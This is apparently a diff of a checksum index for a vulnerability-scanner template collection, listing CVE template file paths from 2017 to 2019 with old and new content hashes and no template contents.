+http/cves/2017/CVE-2017-9506.yaml:e6242c0947de9fc53a17f71f8ff2bd5684b13ced +http/cves/2017/CVE-2017-9791.yaml:dc14bd5c3e0946891aaaf767d700062b1e93c2c0 +http/cves/2017/CVE-2017-9805.yaml:5ff39404cbbdf8baaa29566c72c85f3d2725719b +http/cves/2017/CVE-2017-9822.yaml:847d45a7a9e05fdfb069c9f7ae5f34479d997be0 +http/cves/2017/CVE-2017-9833.yaml:0e7536d49064c392ddd7ce97e25ab8bef769e375 +http/cves/2017/CVE-2017-9841.yaml:09a58df3dfa1ea74d4267a119f9fb28ea945901a +http/cves/2018/CVE-2018-0127.yaml:ac0edda9d31e4404b46448f7cc5020e2d35ef87f +http/cves/2018/CVE-2018-0296.yaml:2ff1b12425f9977079e4c8341a960c6b6d5ea271 +http/cves/2018/CVE-2018-1000129.yaml:02331b43523d5870bbcc4dd1b3dabc81a2e82a60 +http/cves/2018/CVE-2018-1000130.yaml:52296a072a48a50c12a1af7b90d0546c7031f24a +http/cves/2018/CVE-2018-1000226.yaml:275b35a669479f65c7fb4abb219271533b67d7ef +http/cves/2018/CVE-2018-1000533.yaml:4f018bfff5e7659bb9a62f9c4d404eb068791930 +http/cves/2018/CVE-2018-1000600.yaml:6aec257dc53dd1cf2161221f08b931894fc7fad1 +http/cves/2018/CVE-2018-1000671.yaml:0ee1244c39e8b15386dcc315d886891b133a2e43 +http/cves/2018/CVE-2018-1000856.yaml:c9b553f560be7662078247cee32b6988d4e5671b +http/cves/2018/CVE-2018-1000861.yaml:91b8335875ed042fadc39234e9d4a385f9548a1c +http/cves/2018/CVE-2018-10093.yaml:cd11a95522bd3bb0931bbb75c11e6957f723569a +http/cves/2018/CVE-2018-10095.yaml:4737d1ed4ed714484d504ff389cb3d0ce743ef10 +http/cves/2018/CVE-2018-10141.yaml:7151b86fb0fd8557e10926aa5f5646f3179f5053 +http/cves/2018/CVE-2018-10201.yaml:839507da39f73d09eb4ea67836c86b2b32f0c50e +http/cves/2018/CVE-2018-10230.yaml:04bf865c66af294104c0f9f05f399401a364be3d +http/cves/2018/CVE-2018-10562.yaml:9381c58fb2d87dc5159c35ce922045c78d0aa471 http/cves/2018/CVE-2018-10818.yaml:34f57c8fb6fcafafbbc397d63c92e3565d96c1dc -http/cves/2018/CVE-2018-10822.yaml:81e873e63cb9c3720ccc9938798a4e3040e12f52 -http/cves/2018/CVE-2018-10823.yaml:12c6b031fff655f6497a8e99bc3690b86891b65d -http/cves/2018/CVE-2018-10956.yaml:22bd71abf45dde6b5a7476f2878862f602c897b7 -http/cves/2018/CVE-2018-11227.yaml:15be8102ebeeb9a8abbd38781e904c83ebb086df -http/cves/2018/CVE-2018-11231.yaml:a8ef07e41d23ca3234bcd10bd5f40f25765272c7 -http/cves/2018/CVE-2018-11409.yaml:b7f5ae03db18205e650033f7186fc9a3f0bccf0a -http/cves/2018/CVE-2018-11473.yaml:9d68667234d4c59024a5f2327a9d7b1779e30165 -http/cves/2018/CVE-2018-11709.yaml:70ef1b5ed6cb384c6ef15359bca66dcc6370180a -http/cves/2018/CVE-2018-11759.yaml:675a878a37da7f20ea8bdff3a9a8c7deb2808bdc -http/cves/2018/CVE-2018-11776.yaml:08e5c7ae837274cc8a67cde898f267b8f38f1e27 -http/cves/2018/CVE-2018-11784.yaml:490f343c0822c8ac9990cf9be96e093e188a213e -http/cves/2018/CVE-2018-12031.yaml:3f424517db9d7a30714f65ad0ea649e7296314a4 -http/cves/2018/CVE-2018-12054.yaml:5cc966be11ca01dca2dd992029a7dc37d557df6c -http/cves/2018/CVE-2018-1207.yaml:c150004ae7a99273816ce5b841d9f9a48751333a -http/cves/2018/CVE-2018-12095.yaml:f707f7b2cef831a439483141e42923a6fcc723d1 -http/cves/2018/CVE-2018-12296.yaml:f0a94f4f56d03d09b4b8fdb8e0a90829d58b603e -http/cves/2018/CVE-2018-12300.yaml:93a9f6bb9f5ba59a41f78a199be76911131dfe79 -http/cves/2018/CVE-2018-12613.yaml:af4decccfd91bdce61338330e752f7adcb060547 -http/cves/2018/CVE-2018-12634.yaml:97f1cfdcbed90fb7a31411006fdf658723d04193 -http/cves/2018/CVE-2018-12675.yaml:22a40df123b30f46fd10da473215020c2a3791cf -http/cves/2018/CVE-2018-1271.yaml:151efb498a9cd2aad7b7aacb5b37de5ee58327b5 -http/cves/2018/CVE-2018-1273.yaml:5b87afb6192da9901417c7f9d9d0ef286ced97f2 -http/cves/2018/CVE-2018-12909.yaml:1419db77cb21559bbe19e4cc4eca4cf5c8275dda -http/cves/2018/CVE-2018-12998.yaml:05880d1585240c7d2b744235a65126957833ed79 -http/cves/2018/CVE-2018-1335.yaml:5b86c670cbc5b612963e0f62304f9504f970b6d8 -http/cves/2018/CVE-2018-13379.yaml:1359999f23be6c6d94114f4a1d4e91d5cbf369ad -http/cves/2018/CVE-2018-13380.yaml:83fab6485b1fccbc643abb25c0dff9ab77b01995 -http/cves/2018/CVE-2018-13980.yaml:4384979b122efa27823387e78aa9437905ff61e6 -http/cves/2018/CVE-2018-14013.yaml:4a8193ae3a26b34d1e30e35e973f125420a79a36 -http/cves/2018/CVE-2018-14064.yaml:8d13b6de7abbb43c2326edc5cc94a51c991b6250 -http/cves/2018/CVE-2018-14474.yaml:bd83f21abf945b3bb2f9bf5b1676b8181daf2002 -http/cves/2018/CVE-2018-14574.yaml:2621475634d697e09f9630396944311dc894a0c2 -http/cves/2018/CVE-2018-14728.yaml:94a6f47f5968ab0f2492f5306d84074fdfab4bb9 -http/cves/2018/CVE-2018-14912.yaml:4a28176e0cff941699ac9915dc869f4616875231 -http/cves/2018/CVE-2018-14916.yaml:d580d1a94012a7847984d190ba45be447525c41a -http/cves/2018/CVE-2018-14918.yaml:5a46281e098d276eb7ebc313e42565ed5f06d9af -http/cves/2018/CVE-2018-14931.yaml:dd639d405c86380fd11e6133a2ed4a0255448168 -http/cves/2018/CVE-2018-15138.yaml:36f31a268f34ecb7d3bc9dbb8780a3331a0a85a0 -http/cves/2018/CVE-2018-15517.yaml:630aa932c228a3d5ab7535ce105b7221c784375f -http/cves/2018/CVE-2018-15535.yaml:5a976b8f0b17f4042a90bde5f49012c04bd0ee9a -http/cves/2018/CVE-2018-15745.yaml:367ddf7a4c089a1476fe48716e69e9b0e8594190 +http/cves/2018/CVE-2018-10822.yaml:2fb450cccae46f4d618d5d69221506610d18a8c5 +http/cves/2018/CVE-2018-10823.yaml:dff541628767210782862f37bfaca4fed4e0787e +http/cves/2018/CVE-2018-10956.yaml:e6de701b1236249bb05028b74de742c2e1134000 +http/cves/2018/CVE-2018-11227.yaml:265abda90f14fe653a63a8331cca48944fdbea73 +http/cves/2018/CVE-2018-11231.yaml:90db21bce4401b866754c37a71c6e004e3fcc26b +http/cves/2018/CVE-2018-11409.yaml:13bf095e4a487acd67885ebbedad73114f9c1b2b +http/cves/2018/CVE-2018-11473.yaml:cb1d2265d46fa2ddf2eb8aeb0b38ec03dcdfde74 +http/cves/2018/CVE-2018-11709.yaml:e0e4c48cfdd86c7acd04eafc3b38819ff3600f43 +http/cves/2018/CVE-2018-11759.yaml:ed21d04b36489502eaf2bc4f904af804d0daee80 +http/cves/2018/CVE-2018-11776.yaml:6c9553bbd8701c848278e91d4db08efebde32f88 +http/cves/2018/CVE-2018-11784.yaml:4a4ea9806adeb1f9f8c9913c4d0dba0872cd93f5 +http/cves/2018/CVE-2018-12031.yaml:70cbdc081fc0b0b7060db2ba4e9a9b1e50f34252 +http/cves/2018/CVE-2018-12054.yaml:a34fc98da21eeb40386f3887beaf5d227baf995c +http/cves/2018/CVE-2018-1207.yaml:4baa969da84ae7f6140e472333337c03a6c677f9 +http/cves/2018/CVE-2018-12095.yaml:427fdcb2619372156a944000e94dac4227b50ceb +http/cves/2018/CVE-2018-12296.yaml:9fa14b5a23aa6986965003faf59493996c43dec6 +http/cves/2018/CVE-2018-12300.yaml:d1bd20fd64436bed9338477214e4742c4b3af079 +http/cves/2018/CVE-2018-12613.yaml:ffdcb74d3bc3acbc2ef3c24277d48ec1c0be8467 +http/cves/2018/CVE-2018-12634.yaml:efafd7e8f7d7c39a8d96116eef2d412f51b6db3d +http/cves/2018/CVE-2018-12675.yaml:61b6e804e73e79e398ce99da7e67e7383023c5a7 +http/cves/2018/CVE-2018-1271.yaml:8c2c93165a2c71dd6c0932e7ce51bf08d3f19af1 +http/cves/2018/CVE-2018-1273.yaml:d875dba8b4cb52a45367b874895c2779f057d852 +http/cves/2018/CVE-2018-12909.yaml:66c0211b17cddc0827d46cd4c9e659f38ca95d89 +http/cves/2018/CVE-2018-12998.yaml:f486f3566a9c80c94ea4cdff120c9b5c1c0e73f2 +http/cves/2018/CVE-2018-1335.yaml:a468435d8d2abbdb04b2cdae630526b8a116a0f0 +http/cves/2018/CVE-2018-13379.yaml:521ec93923d1b5ead633ccc310407404b1fe2f77 +http/cves/2018/CVE-2018-13380.yaml:666c6d2c396dc70647516c1fc11be9d48727cdc3 +http/cves/2018/CVE-2018-13980.yaml:a5b647bb7232bbd827bb263e46670ba0822d3191 +http/cves/2018/CVE-2018-14013.yaml:a0befebb274ca6db77f7e60447bd23217ef244c4 +http/cves/2018/CVE-2018-14064.yaml:9b369cd29a508a4e9a1b89d07ebf727848bd5905 +http/cves/2018/CVE-2018-14474.yaml:650b026342ec33de6ec0cf998f015b57837dc806 +http/cves/2018/CVE-2018-14574.yaml:682f8b57fa5e18e1d6422fbf91aee6f6d1c101d8 +http/cves/2018/CVE-2018-14728.yaml:d0c32ef7e182e10df2c2a036ff1859edb1532c11 +http/cves/2018/CVE-2018-14912.yaml:cfdfdf9915cf07f17248311390c2f76b3496e797 +http/cves/2018/CVE-2018-14916.yaml:3979dff6178f47900e20a6296bf353de270c2390 +http/cves/2018/CVE-2018-14918.yaml:238e579eacfd6dc6fe9a8aec071457e0f2aea775 +http/cves/2018/CVE-2018-14931.yaml:6c1370722086cf55a9a9a9d7bf5fbf7b9f8f7a25 +http/cves/2018/CVE-2018-15138.yaml:e8397ad3b361d7623851bdae734337511563d752 +http/cves/2018/CVE-2018-15517.yaml:97a60e9ba8c49555ecdc1de326646bdce379367c +http/cves/2018/CVE-2018-15535.yaml:a3ab48b0e9b34831912bd65fcdc1769cc1bb788a +http/cves/2018/CVE-2018-15745.yaml:88dca74464f134a517725f215c56e64df369f9b6 http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9 -http/cves/2018/CVE-2018-15961.yaml:cb650b9eb6d6106d7fdd8ee6d9caf616396c0339 -http/cves/2018/CVE-2018-16059.yaml:346b58eb5f9f9828c0a43fe5de951bef08d6f84e -http/cves/2018/CVE-2018-16133.yaml:887665262f6debceddc70e7f66ca2bb21a791555 -http/cves/2018/CVE-2018-16139.yaml:236b830db60ecdb17a373a208ddf1dd165ae2ebc -http/cves/2018/CVE-2018-16159.yaml:cce9a3dacc9e5b537c8e22ec843e4e687e03db4c -http/cves/2018/CVE-2018-16167.yaml:c10662cf926a74afa511c6850acb37dfbf4c532f -http/cves/2018/CVE-2018-16283.yaml:5531ed555a22ac956bd5f3f25080d045e9b9daa0 -http/cves/2018/CVE-2018-16288.yaml:24d81cd5a8404843af3b4c56c68d775eff419f14 -http/cves/2018/CVE-2018-16299.yaml:d39be25cdb84926ac56f7e57639cfb625b86eefd -http/cves/2018/CVE-2018-16341.yaml:f2242eb9ce97332e5fc9505ecdfdbb26d2fe6fdd -http/cves/2018/CVE-2018-16668.yaml:af353a7a4894b6b4ad3299522d09241e3fe2e6d1 -http/cves/2018/CVE-2018-16670.yaml:640c7c105947d4ff9f0dba13e4d58b4ed5d5ff29 -http/cves/2018/CVE-2018-16671.yaml:f9e9a275821cd443215b5691b6bdc98e944ebc7b -http/cves/2018/CVE-2018-16716.yaml:3ebb6a41e86aaebbe7b5f2532c249f2d8159ff03 -http/cves/2018/CVE-2018-16761.yaml:81d682abe72f7d5fd5a01f06c8e99b50a1415209 -http/cves/2018/CVE-2018-16763.yaml:943c0e5c9cfc765e29c1effe383a7854ec1fe6a5 -http/cves/2018/CVE-2018-16836.yaml:da5026389f7ce6e91a19c9eac762ee4b6e45a6ce -http/cves/2018/CVE-2018-16979.yaml:4b136214702a175b5d36385d529fb3f43bc5bd65 +http/cves/2018/CVE-2018-15961.yaml:4a84833aa476628690afaa6e8393778c7b1fa7e1 +http/cves/2018/CVE-2018-16059.yaml:2bc83e07170dc9ea77ff059674df7f5a4e1a54f7 +http/cves/2018/CVE-2018-16133.yaml:88fde344639d339c2eef187fbeb6427493c17c2f +http/cves/2018/CVE-2018-16139.yaml:edfb32f379852a46995214ecbe606db953e3c272 +http/cves/2018/CVE-2018-16159.yaml:92088d2928712d69ec2bf21fc0323c858a8de5eb +http/cves/2018/CVE-2018-16167.yaml:b7f024073ad4d46e1f19de0ce2353149d1036bc2 +http/cves/2018/CVE-2018-16283.yaml:e3f3cbb782a4b4058da8ba4fea1ec0871f900e2d +http/cves/2018/CVE-2018-16288.yaml:eec8720c15d4e44f7f41f3982f269f4594be2142 +http/cves/2018/CVE-2018-16299.yaml:b123ccec90a4b1590c184b9ffc8adc87e4cc60b1 +http/cves/2018/CVE-2018-16341.yaml:299c6762dd858a156164ae823dab54b900fb9ebd +http/cves/2018/CVE-2018-16668.yaml:fb679b93948dbb3ac150e1637565403ac6be87cb +http/cves/2018/CVE-2018-16670.yaml:870b35fc91f13076fe0a3517a31b09c67eb0b28c +http/cves/2018/CVE-2018-16671.yaml:a8a1cc348d88ac47eb3fc4616b3a98135fa63f9f +http/cves/2018/CVE-2018-16716.yaml:665d29762c3315e038a0e8e871adcf412330635b +http/cves/2018/CVE-2018-16761.yaml:671bec1c70162ca554ee907e8e363d4a190869b8 +http/cves/2018/CVE-2018-16763.yaml:c70554b96810080b8836733cdad235fe599bd8c8 +http/cves/2018/CVE-2018-16836.yaml:756dfb1362f332c600a00797f22d4d1bc721c918 +http/cves/2018/CVE-2018-16979.yaml:b6de9ceda596f39e96f4145c9f3c02014ff47a87 http/cves/2018/CVE-2018-17153.yaml:e199ab39ec71cc03f2e14301499fc965090b7e30 -http/cves/2018/CVE-2018-17246.yaml:da81e8946ecda0dd100ac2ee9438d0bee18e837f -http/cves/2018/CVE-2018-17254.yaml:8b594ee917e807b882251e34f77b218deb879948 -http/cves/2018/CVE-2018-17422.yaml:5b9f7c0d6f5bb5cd6bab9b21c95845739236ae22 -http/cves/2018/CVE-2018-17431.yaml:384517f1a2fb3caf3ac82b268630223dbc855c32 -http/cves/2018/CVE-2018-18069.yaml:49f04dafec87900a45d217bef9a9b2955705b631 -http/cves/2018/CVE-2018-18264.yaml:aa4e787c809890975e5633d14c53f5d714fd498e -http/cves/2018/CVE-2018-18323.yaml:849c425a1f14c782cae7417efe7e8f32b564c7d8 -http/cves/2018/CVE-2018-18570.yaml:7feaece1a205ace1d72fef728978bf45385b9571 -http/cves/2018/CVE-2018-18608.yaml:11c471985c939bb113569900d36dc6539b6f1a57 -http/cves/2018/CVE-2018-18775.yaml:27d22d6e651e771a3e3660ddeb3e8c08092b7c8c -http/cves/2018/CVE-2018-18777.yaml:320f0f5bcd52004f83899fef362ef99d379f5510 -http/cves/2018/CVE-2018-18778.yaml:3b5d9647173502652005c766bebbd56fee0c105e -http/cves/2018/CVE-2018-18809.yaml:785a7ad44a0d09128ff2abd3e8b578070b67dcb9 -http/cves/2018/CVE-2018-18925.yaml:498b177f759a3ddde3e902f6234e85e824f1e777 -http/cves/2018/CVE-2018-19136.yaml:dbd1e18154ab0ad6cbc7c9657d223e14b9829ed5 -http/cves/2018/CVE-2018-19137.yaml:fbb0472e8dedfbca60c66a13eb7d32aace815602 -http/cves/2018/CVE-2018-19287.yaml:c2798a24b888e1409d9dadf3e893f0fefe721dc5 -http/cves/2018/CVE-2018-19326.yaml:de1df37ca4efa8ab2466095f8abe732ea94f0acf -http/cves/2018/CVE-2018-19365.yaml:685e19ff02e6b59e50ba1aa6106a5016bddf9da1 -http/cves/2018/CVE-2018-19386.yaml:a0dcffb11547f2022b876f5f2f7c865027ab34d9 -http/cves/2018/CVE-2018-19439.yaml:fdeaf60a94a607a2749cd5dfa7d26c0ea8c835c9 -http/cves/2018/CVE-2018-19458.yaml:94d9cf557ea83df61c07680684bec39337bf1a95 -http/cves/2018/CVE-2018-19749.yaml:a19afcfd73b122b85eaeb52b59d248efcec4f85a -http/cves/2018/CVE-2018-19751.yaml:4628d6cadd46038957cbb295ee451b005ad120ef -http/cves/2018/CVE-2018-19752.yaml:575b2298a167fe3a2f275b8c035f3980c7274caf -http/cves/2018/CVE-2018-19753.yaml:a4bed581cc3b45b02a6211d9b027f3bada5e807e -http/cves/2018/CVE-2018-19877.yaml:155afbb6c93d31ff682bf80e1560bf4351035640 -http/cves/2018/CVE-2018-19892.yaml:32a02208d8fa5631bd0f60fafe13e2c515feda32 -http/cves/2018/CVE-2018-19914.yaml:2523df996334f802f4635c175b2ebe7bbdff48a6 -http/cves/2018/CVE-2018-19915.yaml:6f35627152f89bd84f79bb10dd3788dccd874ef4 -http/cves/2018/CVE-2018-20009.yaml:e55629b8583da183df1da3fe6e54a137e3ad0093 -http/cves/2018/CVE-2018-20010.yaml:4464c08288e08a2ccaa38b84b01fbec06011bd1a -http/cves/2018/CVE-2018-20011.yaml:641b625f69120d1f34a29590b346b05b462c64ad -http/cves/2018/CVE-2018-20462.yaml:08da784513d3e8c6c7bc2c5633e9d5fc4275d4b1 -http/cves/2018/CVE-2018-20463.yaml:eba2702fda615b8078bd064f5d48001db0d87e57 -http/cves/2018/CVE-2018-20470.yaml:8b15f66ee76872c995e8fc10657ef618dc2afc5a -http/cves/2018/CVE-2018-20526.yaml:de5bd1a26cbd9d597968d510c797ccb384064320 -http/cves/2018/CVE-2018-20608.yaml:debf50b67f712317fe40a3edfbd41913758e7b65 -http/cves/2018/CVE-2018-20824.yaml:ebba62a398a4201a0948bdfafbbfc80cc38bc9a2 -http/cves/2018/CVE-2018-20985.yaml:b20b38efa4408bbbc54d738ce983ec0a63a4a17b -http/cves/2018/CVE-2018-2392.yaml:73dfa8ef5d12d6663e875863ef3e4f77b080f433 -http/cves/2018/CVE-2018-2791.yaml:5b611a1022fd81ba9b2c4f9137e2d6fe03cf0a85 -http/cves/2018/CVE-2018-2894.yaml:258c0ead8a624f0af36d60a94c0b6107382a632c -http/cves/2018/CVE-2018-3167.yaml:6866d32df4ab81ead83c95a9342e0d072d30fa3b -http/cves/2018/CVE-2018-3238.yaml:930ee72bb543b88303abea2f6df8a210298db28b -http/cves/2018/CVE-2018-3714.yaml:2eb846fed6899930e1c4b149bce1312d5ecac155 -http/cves/2018/CVE-2018-3760.yaml:2a602a30af0bdbcdfbfc1c6c704b7a3b6c36b8f4 -http/cves/2018/CVE-2018-3810.yaml:ed9ae2bd4562bdcd2860e1dde33da2c8f0d81bbf -http/cves/2018/CVE-2018-5230.yaml:52acd7600ba288bd77ab0f93d731621cc919d990 -http/cves/2018/CVE-2018-5233.yaml:bc20b1c6cb0856c00c258ad89dc7012d77342aa5 -http/cves/2018/CVE-2018-5316.yaml:c68c3b55fd7e5c92b6bba46867d9df681ffe8c36 -http/cves/2018/CVE-2018-5715.yaml:8c7c2cd33de760788cc9db571c4502d808813568 -http/cves/2018/CVE-2018-6008.yaml:5aa3202baa3d2b98f94bf787e2da342aa68b5d14 -http/cves/2018/CVE-2018-6184.yaml:87dc0d6062107a36dd1a8dcb0846add4d31495ce -http/cves/2018/CVE-2018-6200.yaml:6cdea462748da040a57177d0643bf12f852c6941 -http/cves/2018/CVE-2018-6530.yaml:43cf79f24c17bcb9347c3cae5c52b5b3ed5238b4 -http/cves/2018/CVE-2018-6910.yaml:a20b5f1f78762fc36515abdb9d48addf9a0961d6 -http/cves/2018/CVE-2018-7251.yaml:7e2fe9a302f1c897b437bc9ae1a5cea1781e9cb4 -http/cves/2018/CVE-2018-7422.yaml:3ca4f6f92bdd4abb5e215c7dd31e3b6e84107564 -http/cves/2018/CVE-2018-7467.yaml:23ada4871ce957b49f9e5c252244987a40bde1e1 -http/cves/2018/CVE-2018-7490.yaml:e93fa5fb3a9e91d1ac01dba4749145eeb9a75b25 -http/cves/2018/CVE-2018-7600.yaml:933802ea6d2c85fe805792ba35c2f58d6dfccc07 -http/cves/2018/CVE-2018-7602.yaml:48a17f9a167a9d3849311bd21f0b88492f3d5e5d -http/cves/2018/CVE-2018-7653.yaml:dbcf206477385f26968093eb6a1217d868106fa7 -http/cves/2018/CVE-2018-7662.yaml:96fae0e9203351425c2ca823e809f5887faaddd3 -http/cves/2018/CVE-2018-7700.yaml:3f8650ee87c571398f324e78fe09ac165bc8c7c5 -http/cves/2018/CVE-2018-7719.yaml:9e9b2cccbc6af6ba34cfeeb430b70e9c2595508d -http/cves/2018/CVE-2018-8006.yaml:c26a97e1961137a96fc782e789a1b98a218426fc -http/cves/2018/CVE-2018-8033.yaml:1b6bbbfad0099e406197375060af5696a30c9690 -http/cves/2018/CVE-2018-8715.yaml:a0dafb48adcfcf3b8024b74e109e7c5ee10841bc -http/cves/2018/CVE-2018-8719.yaml:cc1f1dbc4701ebe0662534b16c709d8600adb310 -http/cves/2018/CVE-2018-8727.yaml:ff58639b3708bbfe7a74b76a76b291d4886f5eee -http/cves/2018/CVE-2018-8770.yaml:1a2f507ef7a32f03ac9f0c7777b53c1a6ccf6784 -http/cves/2018/CVE-2018-9118.yaml:0c8295e302dcb711398adb0514746db31d360c43 -http/cves/2018/CVE-2018-9161.yaml:b16f3c69ac27681b060ad8a28a83b612bc36de28 -http/cves/2018/CVE-2018-9205.yaml:668b9d033db4a3d24d8343d9896481f5ea3c4776 -http/cves/2018/CVE-2018-9845.yaml:eaed4d617d1dfce08579fb8b9c1b47bf77a3fbe6 -http/cves/2018/CVE-2018-9995.yaml:d5cf53ff181b1c307f041ff176c678ded13610d1 -http/cves/2019/CVE-2019-0193.yaml:61054f3723a7ac84b41c3d310ae8917e52a4391f -http/cves/2019/CVE-2019-0221.yaml:b4467f39b52e40556ff119a3874d878bde60083d -http/cves/2019/CVE-2019-0230.yaml:73b57e1519d8e13ef9b1e321473c1116fcf34f5e -http/cves/2019/CVE-2019-10068.yaml:86cda9e30a3954bd336e0865684f26a753345ff8 -http/cves/2019/CVE-2019-10092.yaml:c167ee76cfbec1567f9c68f3f53ad12c8f44d77a -http/cves/2019/CVE-2019-10098.yaml:2341494725584e7d82ddbf1ee631384175ac466a -http/cves/2019/CVE-2019-1010287.yaml:d620a72aeea966b7f345eb535fcedbb4d967a6fd -http/cves/2019/CVE-2019-1010290.yaml:fc58ea6dce4ef8d4baa6131794b67e95d7f87dda -http/cves/2019/CVE-2019-10232.yaml:e7de8a7167ca4ce61fa063b72d307e26b9d94ee0 -http/cves/2019/CVE-2019-10405.yaml:5a626f5c14c4dac27e651a774f51cdb43baacf23 -http/cves/2019/CVE-2019-10475.yaml:c05cfe8a7773c6222f03f09bfa932993bec9c44e -http/cves/2019/CVE-2019-10692.yaml:2f93999014a4ec011e83e8cf32fa9cfbc1a4464e -http/cves/2019/CVE-2019-10717.yaml:069a44b0749279c0f986c55eb06d79141a7be78b -http/cves/2019/CVE-2019-10758.yaml:750407bf099b1b8a5aaf1c4d1487caecbd7f1429 -http/cves/2019/CVE-2019-11013.yaml:441154e14271c8cfb8ef341a52d467c22d1c5334 -http/cves/2019/CVE-2019-11248.yaml:1a5ef31b57cef0f724ef8b608a984be94b819438 -http/cves/2019/CVE-2019-11370.yaml:dea1a265011ad642e1ea95ebc2915caaf7639a51 -http/cves/2019/CVE-2019-11510.yaml:1e36054855803f6ebe901851421de4dd65092e4b -http/cves/2019/CVE-2019-11580.yaml:643a2464eec7641dfd00a48ab60539a740809d00 -http/cves/2019/CVE-2019-11581.yaml:ea64e5dbe55cf0d4bf36b2011a0e1b5135412d4f -http/cves/2019/CVE-2019-11869.yaml:b4e6f8f17fa3cb96c4a24fb46f904dccd9c62c0d -http/cves/2019/CVE-2019-12276.yaml:5855e0bcacaf52c4923dea74e9525428e5e5e33f -http/cves/2019/CVE-2019-12314.yaml:430eceba7206a81221d344136d30ff85b68ca8d8 -http/cves/2019/CVE-2019-12461.yaml:af2932850294331d7f0dddd8e340edd5e95d8d40 -http/cves/2019/CVE-2019-12581.yaml:0dfad02b3546704228bb7e1ff934502233921203 -http/cves/2019/CVE-2019-12583.yaml:2a95d709b6b1c3158dc7c0f8a5f65f3bd4cacca3 -http/cves/2019/CVE-2019-12593.yaml:5b4a0344931f96436c1743afa5dd76917209dc81 -http/cves/2019/CVE-2019-12616.yaml:af60983605159100bd82e051e9bc4dbc9c9d4403 -http/cves/2019/CVE-2019-12725.yaml:f955598564b604c6677c0f733133ba6912e90f74 -http/cves/2019/CVE-2019-12962.yaml:73eeaef67dffe3bbbd9cf25ab557360d7747b8f0 -http/cves/2019/CVE-2019-12985.yaml:c01e12f1ee7142240d2d250b6e1d477f983faf7d -http/cves/2019/CVE-2019-12986.yaml:b3e16c50c1b3b05ef439a604164a132566bec8af -http/cves/2019/CVE-2019-12987.yaml:56d2638ec5a522ef5997d52fd54a1926e20710aa -http/cves/2019/CVE-2019-12988.yaml:8b1ee9f63d53abe480ce518153c564bc717b3b0f -http/cves/2019/CVE-2019-12990.yaml:e2419824438eb4e1fb4a2f3e4219849c81e3e27e -http/cves/2019/CVE-2019-13101.yaml:fa4358332c8884afb9bc7f9dc8c55859a8a7f20e -http/cves/2019/CVE-2019-13392.yaml:a20224538957d970cfc8fda21cff31dd5232d73f -http/cves/2019/CVE-2019-13396.yaml:2d33f664e4c89bd9d4a7e171dcbb409188721d55 -http/cves/2019/CVE-2019-13462.yaml:bc8da980897f539db84e28a8f1df3cb24e3c4534 -http/cves/2019/CVE-2019-14205.yaml:0e2981087a804b27a2d4e97c880bb59c0e3b920c -http/cves/2019/CVE-2019-14223.yaml:640cd02aa791af184c13d328fb4a91926d96e73f -http/cves/2019/CVE-2019-14251.yaml:f403d2b61bb523c45df76a220cea3f6f1b68a6d2 -http/cves/2019/CVE-2019-14312.yaml:a33bedc9fdeecb349686cf5bfb422b923f9ce924 -http/cves/2019/CVE-2019-14322.yaml:d73519a850b0d785c6e8cb491f30921d2f7b0939 -http/cves/2019/CVE-2019-14470.yaml:bb7497266f374f07065b107a3c91fb186eae93c7 -http/cves/2019/CVE-2019-14530.yaml:0f0daa2fa4bd62d0b3959621fed1efe1932f1a22 -http/cves/2019/CVE-2019-14696.yaml:0fe8b8654dd9555914c29d9d0dd5daa348a297ec -http/cves/2019/CVE-2019-14750.yaml:c53d56adea726a780523bf7871945fbd03cbcfb4 -http/cves/2019/CVE-2019-14789.yaml:06216da70ecd8eca5e67a66edb3910de8e195058 -http/cves/2019/CVE-2019-14974.yaml:f9c6447c314507ded7e5f8dc27903f940c67e28f -http/cves/2019/CVE-2019-15043.yaml:ea0e70011037857afcc47048fa7701e29ceaa539 -http/cves/2019/CVE-2019-15107.yaml:3c554c04e374d78a37d513473e658cd8628af3eb -http/cves/2019/CVE-2019-15501.yaml:4b8a03cd003f9596033d87549b4913b2de5fe124 -http/cves/2019/CVE-2019-15642.yaml:911ae9882b37727a94745b215ceb7dcfafeb437f -http/cves/2019/CVE-2019-15713.yaml:72c6c13878f99b06b20e22bd14576e211d0a46fb -http/cves/2019/CVE-2019-15811.yaml:a426f0a679eacb10ac1e493b2111ee93b20b96c8 -http/cves/2019/CVE-2019-15858.yaml:9548afb2b04483ce036dd3d6a557351e181ff430 -http/cves/2019/CVE-2019-15859.yaml:12f3e9efb3f16c6076d21b0903b95dd8267e95a9 -http/cves/2019/CVE-2019-15889.yaml:663437a3280f3bb361e802d414de1bcbbb6754b0 -http/cves/2019/CVE-2019-16057.yaml:d84ab085128ca20ed8a3026a3ed7a57fe63de8aa -http/cves/2019/CVE-2019-16097.yaml:4ad590e1b47160f214cd2ea69ddf2b627dd65b3e -http/cves/2019/CVE-2019-16123.yaml:833d19144df61171ceeccddb50a775b03d0bb340 -http/cves/2019/CVE-2019-16278.yaml:18e2a25a922a95014b7c74e1204cff6fee67d1a3 -http/cves/2019/CVE-2019-16313.yaml:a1bfec99ab7937aa008a62f912084645a8fce361 -http/cves/2019/CVE-2019-16332.yaml:0f9b37eefb51d672b4294861fec3618968e8532c -http/cves/2019/CVE-2019-16525.yaml:ceb5fbbb06a2d2d143078e9d32bb5d7bf10386a8 -http/cves/2019/CVE-2019-1653.yaml:e90e023b581049768b99e390a1de1c5653d2bd78 -http/cves/2019/CVE-2019-16662.yaml:dc0d89bc098ae28f90f83cfbed9910a6bb04c96b -http/cves/2019/CVE-2019-16759.yaml:6e7c2f7418658f5e64bd63c1dc1423c7120f3539 -http/cves/2019/CVE-2019-16920.yaml:c879f09d6da007b235247af53a0a107c9f58ec13 -http/cves/2019/CVE-2019-16931.yaml:c6bf86e0033107b8091a226cc8075c4d7485cc55 -http/cves/2019/CVE-2019-16932.yaml:279594badfcea915149c081ad5ccdb746f403085 -http/cves/2019/CVE-2019-16996.yaml:2da81a032f1eac514cf74e2c62f1a9c1f1e8bd3f -http/cves/2019/CVE-2019-16997.yaml:b9ac273715d7da233baf0b9e3180af0488d76f4f -http/cves/2019/CVE-2019-17270.yaml:753b1a11e0afebc875def6aaacffa3e4c866eb21 -http/cves/2019/CVE-2019-17382.yaml:6f51c28e392cfaf1c63b1e9190e136d1e9008a97 -http/cves/2019/CVE-2019-17418.yaml:c821f2c0ba83f11365c1ee1accd66cffe2711481 -http/cves/2019/CVE-2019-17444.yaml:a446f88ef41c70d8182458ee2da315677d9c1761 -http/cves/2019/CVE-2019-17503.yaml:0b4f2ae62ee284e1d41edd91bd258e9842a91b69 